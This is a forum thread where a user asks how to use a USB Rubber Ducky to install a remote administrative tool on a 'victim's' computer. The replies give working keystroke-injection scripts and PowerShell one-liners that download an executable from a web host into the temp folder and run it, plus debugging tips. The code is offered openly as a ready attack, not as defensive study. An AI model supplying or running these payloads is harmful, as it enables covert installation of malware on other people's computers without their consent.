Jump to content

How To Use Ducky To Install & Execute A File?


Recommended Posts

I have remote administrative tool, I want to beatable to plug my USB Rubber Ducky into a victims computer and have the USB Rubber Ducky execute the file. I can either have the file be remotely downloaded or have this file be installed on the USB Rubber Ducky. I have tried to write my own script but I always run into errors. It would be really helpful if someone could post their script. Thanks a Lot!

Link to post
Share on other sites

Upload the file to a service like Skydrive or DropBox. Get a shared link through this and write a script for the duck to start Powershell. Then get it to type this:

powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"

Give that a go.

Link to post
Share on other sites

Look at the back of the card you got with your ducky!

Mubix has created an example to do exactly that :)

REM Title: Powershell Wget & Execute            Author: Mubix                  Version: 1.2
REM Description: Opens Run menu, throws power shell string, enter. Supports HTTP/S and Proxies.
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER
Link to post
Share on other sites
  • 2 weeks later...

Many admin tools have an automated or silent install feature. Here is an example of how to install 7zip with a duck script. You may have to tweak for delays.

REM *** Delete 7zip files if they already exist. ***
STRING erase /Q 7za.exe 7z920.zip 7-zip.chm license.txt readme.txt
ENTER

REM *** Install 7zip. ***
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://downloads.sourceforge.net/sevenzip/7za920.zip','%TEMP%\7za920.zip'); $shell = new-object -com shell.application; $zip = $shell.NameSpace('%TEMP%\7za920.zip'); foreach($item in $zip.items()) { $shell.Namespace('%TEMP%').copyhere($item) }Start-Process '%TEMP%\7za.exe' -ArgumentList '/S /D=%PROGRAMFILES%\7-Zip\'
ENTER
REM *** Delay 7 Seconds. ***
DELAY 7000
REM *** Switch from powershell back to command line. ***
STRING CMD
ENTER

I have it downloading from a website, and unzipping the files in the process, then installing. Runs in the command prompt. Had to cobble together a couple pieces of code to do this.

Edited by overwraith
Link to post
Share on other sites
  • 4 months later...

OK. got it... %temp% and ' give me error. %temp% -> $env:temp and ' -> ".

STRING powershell (new-object System.Net.WebClient).DownloadFile("http://example.com/bob.old","$env:temp\bob.exe");  Start-Process "$env:temp\bob.exe"
Link to post
Share on other sites

I tried this on a 5.5 MB .wav file through a public dropbox link.

This resultet in a corrupt 64KB .wav file on my machine.

I can't find any documentation that states a limit to the file size.

Does anyone know what may have happned?

As far as I am aware, there is no limitation to the file size. You might want to download the file normally, or check to see if the powershell script hasn't changed the file name etc.

I know it can do over 1GB, as I don't like to use all of my download limit, so I set up an automated script that detects when my PC is offpeak with the internet useage, and it downloads it then. Works fine, and no problems with large files.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...